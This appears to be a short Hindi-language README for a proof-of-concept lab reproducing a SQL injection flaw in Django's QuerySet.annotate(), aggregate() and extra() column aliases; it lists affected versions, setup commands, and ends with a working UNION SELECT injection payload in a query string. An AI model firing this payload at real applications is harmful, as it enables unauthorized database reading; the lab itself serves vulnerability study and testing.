
Django 2.2 (2.2.28 से पहले), 3.2 (3.2.13 से पहले) और 4.0 (4.0.4 से पहले) में एक समस्या खोजी गई। QuerySet.annotate(), aggregate() और extra() विधियाँ, **kwargs के रूप में पारित एक विशेष रूप से तैयार की गई डिक्शनरी (डिक्शनरी विस्तार के साथ) के माध्यम से कॉलम एलियासेस में SQL injection के प्रति संवेदनशील हैं।
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --
